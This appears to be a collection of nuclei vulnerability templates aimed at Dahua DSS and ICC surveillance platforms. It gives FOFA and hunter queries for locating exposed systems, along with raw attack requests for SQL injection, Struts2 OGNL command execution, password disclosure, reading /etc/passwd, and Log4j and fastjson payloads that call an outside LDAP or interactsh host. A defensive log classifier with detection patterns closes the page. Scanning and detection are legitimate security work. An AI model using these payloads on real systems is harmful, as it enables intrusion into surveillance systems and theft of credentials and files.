Dahua

Dahua DSS Digital Surveillance System: attachment_clearTempFile.action SQL injection

FOFA:app="dahua-DSS"

hunter:app.name=="Dahua 大华 DSS 视频管理系统"


nuclei

```yaml
id: dahua-sql-attachment

info:
  name: dahua-sql-attachment
  author: BY
  severity: high
  tags: dahua
  description: 大华DSS数字监控系统attachment_clearTempFile.action SQL注入

http:
  - raw:
      - |
        GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,(select%2012345678),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: keep-alive

    matchers:
      - type: dsl
        dsl:
          - status_code == 200 && contains(body,'~12345678')
```


Dahua DSS Digital Surveillance System: deleteBulletin SQL injection vulnerability

FOFA:app="dahua-DSS"

hunter:app.name=="Dahua 大华 DSS 视频管理系统"


nuclei

```yaml
id: dahua-sql-deleteBulletin

info:
  name: dahua-sql-deleteBulletin
  author: BY
  severity: high
  tags: dahua
  description: 大华DSS数字监控系统deleteBulletin-SQL注入漏洞

requests:
  - raw:
      - |+
        POST /portal/services/itcBulletin?wsdl HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

        <s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
        <s11:Body>
        <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
        <netMarkings>
        (updatexml(1,concat(0x7e,(SELECT 12345678),0x7e),1))) and (1=1
        </netMarkings>
        </ns1:deleteBulletin>
        </s11:Body>
        </s11:Envelope>

    matchers:
      - type: dsl
        dsl:
          - 'status_code==500 && contains(body,"error code [1105]") && contains(body,"~12345678")'
```


Dahua DSS Digital Surveillance System: Struts2 command execution vulnerability

FOFA:body="/portal/include/script/dahuaDefined/headCommon.js?type=index"&&title="DSS"


nuclei

```yaml
id: dahua-rce-strust2

info:
  name: dahua-rce-strust2
  author: BY
  severity: high
  tags: dahua
  description: 大华DSS数字监控系统存在strust2命令执行漏洞

requests:
  - raw:
      - |+
        GET /admin/login_login.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
        Accept-Encoding: gzip, deflate
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 && contains(body,"bin")'
```


Dahua DSS Digital Surveillance System: user_edit password disclosure vulnerability

FOFA:body="/portal/include/script/dahuaDefined/headCommon.js?type=index"&&title="DSS"


nuclei

```yaml
id: dahua-info-user_edit

info:
  name: dahua-info-user_edit
  author: BY
  severity: high
  tags: dahua
  description: 大华DSS数字监控系统user_edit存在密码泄漏漏洞

requests:
  - raw:
      - |+
        GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: JSESSIONID=1B1D0EBCE3AC082FDBA00062678EAAC9; JSESSIONID=48C3365B18E192DAAB020C90A2BF0DEF
        Upgrade-Insecure-Requests: 1

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 && contains(body,"password") && contains(body,"loginPass")'
```


Dahua DSS Digital Surveillance System: attachment_downloadByUrlAtt.action arbitrary file download vulnerability

FOFA:app="dahua-DSS"

hunter:app.name=="Dahua 大华 DSS 视频管理系统"


nuclei

```yaml
id: dahua-download-ByUrlAtt

info:
  name: dahua-download-ByUrlAtt
  author: BY
  severity: high
  tags: dahua
  description: 大华DDS数字监控系统attachment_downloadByUrlAtt.action-任意文件下载漏洞

requests:
  - raw:
      - |+
        GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
        Connection: close

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 && contains(body,"root:")'
```


Dahua Intelligent IoT Integrated Management Platform (ICC): is-exist Log4j remote code execution vulnerability

FOFA:body="*客户端会小于800*"

hunter:web.body="*客户端会小于800*"

Two request-header variants were tried; they produced 200 and 406 responses respectively.

No directly exploitable assets were found during testing; the JDK versions seen were all above update 191.

nuclei

```yaml
id: dahua-log4j-is-exist

info:
  name: dahua-log4j-is-exist
  author: BY
  severity: high
  description: 大华智能物联综合管理平台(ICC)is-exist存在log4j远程代码执行漏洞

requests:
  - raw:
      - |
        POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/2
        Host: {{Hostname}}
        Sec-Ch-Ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
        Accept-Language: zh-CN
        Timeoffset: -28800000
        Sec-Ch-Ua-Mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Content-Type: application/json;charset=utf-8
        cmd: whoami
        Accept: application/json, text/plain, */*
        User-Client: 1
        Sec-Ch-Ua-Platform: "Windows"
        Sec-Fetch-Site: same-origin
        Sec-Fetch-Mode: cors
        Content-Length: 49

        {"loginName":"${jndi:ldap://${sys:java.version}.{{interactsh-url}}}"}

    matchers:
      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "1.8.0_1"
```


nuclei2

```yaml
id: dahua-log4j-is-exist

info:
  name: dahua-log4j-is-exist
  author: BY
  severity: high
  description: 大华智能物联综合管理平台(ICC)is-exist存在log4j远程代码执行漏洞

requests:
  - raw:
      - |
        POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/2
        Host: {{Hostname}}
        Sec-Ch-Ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
        Accept-Language: zh-CN
        Timeoffset: -28800000
        Sec-Ch-Ua-Mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Content-Type: application/json;charset=utf-8
        cmd: whoami
        Accept: application/json, text/plain, */*
        User-Client: 1
        Sec-Ch-Ua-Platform: "Windows"
        Sec-Fetch-Site: same-origin
        Sec-Fetch-Mode: cors
        Content-Length: 49

        {"loginName":"${jndi:ldap://${sys:java.version}.{{interactsh-url}}}"}

    matchers:
      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"
```

Dahua Intelligent IoT Integrated Management Platform (ICC): random fastjson remote command execution

FOFA:body="*客户端会小于800*" && icon_hash="-1935899595"

hunter:web.body="*客户端会小于800*"


nuclei

```yaml
id: dahua-rce-fastjson

info:
  name: dahua-rce-fastjson
  author: BY
  severity: high
  description: 大华智能物联综合管理平台(ICC)random存在fastjson远程命令执行

requests:
  - raw:
      - |
        POST /evo-runs/v1.0/auths/sysusers/random HTTP/2
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0)
        Connection: close
        Content-Type: application/json;charset=utf-8
        Accept-Encoding: gzip, deflate

        {"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://{{interactsh-url}}"}}""},"b":{{"@type":"java.net.URL","val":"http://{{interactsh-url}}"}:"x"},"c":{{"@type":"java.net.URL","val":"http://{{interactsh-url}}"}:0,"d":Set[{"@type":"java.net.URL","val":"http://{{interactsh-url}}"}],"e":Set[{"@type":"java.net.URL","val":"http://{{interactsh-url}}"},}

    matchers:
      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"
```

nuclei2

```yaml
id: dahua-rce-fastjson

info:
  name: dahua-rce-fastjson
  author: BY
  severity: high
  description: 大华智能物联综合管理平台(ICC)random存在fastjson远程命令执行

requests:
  - raw:
      - |
        POST /evo-runs/v1.0/auths/sysusers/random HTTP/2
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0)
        Connection: close
        Content-Type: application/json;charset=utf-8
        Accept-Encoding: gzip, deflate

        {"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{interactsh-url}}","autoCommit":true},"hfe4zyyzldp":"="}

    matchers:
      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"
```
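As an added defensive example that is not part of the original write-up: a small Python classifier that flags request events matching the probe signatures of the templates above, so a DSS/ICC operator can find these scans in proxy or WAF logs. The endpoint paths come from the templates; the token patterns, the event format and the sample events are this example's own assumptions and constructed data.

```python
import re
from urllib.parse import unquote

# Detection rules for the Dahua DSS/ICC endpoints probed by the templates on
# this page: (rule name, request path prefix, regex over the decoded request).
# Path prefixes come from the templates; the token patterns are assumptions.
RULES = [
    ("dss-sqli-clearTempFile", "/portal/attachment_clearTempFile.action",
     re.compile(r"extractvalue|updatexml", re.I)),
    ("dss-sqli-deleteBulletin", "/portal/services/itcBulletin",
     re.compile(r"extractvalue|updatexml", re.I)),
    ("dss-struts2-ognl", "/admin/login_login.action",
     re.compile(r"%\{.*ognl|processbuilder", re.I)),
    # the user_edit leak needs no payload, so any hit on the endpoint is flagged
    ("dss-user_edit-disclosure", "/admin/cascade_/user_edit.action", None),
    ("dss-file-download", "/portal/attachment_downloadByUrlAtt.action",
     re.compile(r"filePath=(file:|\.\./)", re.I)),
    ("icc-log4j-jndi", "/evo-apigw/evo-brm/1.2.0/user/is-exist",
     re.compile(r"\$\{jndi:", re.I)),
    ("icc-fastjson", "/evo-runs/v1.0/auths/sysusers/random",
     re.compile(r'"@type"\s*:', re.I)),
]

def classify(event):
    """Return the rule names matched by one request event: a dict with 'path'
    (incl. query string) and optional 'headers' (dict) and 'body' (str)."""
    path = event["path"]
    route = path.split("?", 1)[0]
    # Headers and body are scanned too: the Struts2 probe sits in Content-Type
    # and the Log4j/fastjson probes in the JSON body.  The path is decoded
    # twice so %2527-style double encoding does not hide the tokens.
    haystack = "\n".join([
        unquote(unquote(path)),
        *(f"{k}: {v}" for k, v in event.get("headers", {}).items()),
        event.get("body", ""),
    ])
    return [name for name, prefix, pattern in RULES
            if route.startswith(prefix)
            and (pattern is None or pattern.search(haystack))]

# Constructed sample events; payload fragments mirror the templates above.
SAMPLE_EVENTS = [
    {"path": "/portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND"
             "%20EXTRACTVALUE(1,1)&bean.TabName=1"},
    {"path": "/admin/login_login.action",
     "headers": {"Content-Type": "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)}"}},
    {"path": "/evo-apigw/evo-brm/1.2.0/user/is-exist",
     "body": '{"loginName":"${jndi:ldap://example.invalid/x"}'},
    {"path": "/portal/attachment_downloadByUrlAtt.action?filePath=report.pdf"},
]
```

Running `classify` over `SAMPLE_EVENTS` flags the first three events and leaves the benign download request unflagged.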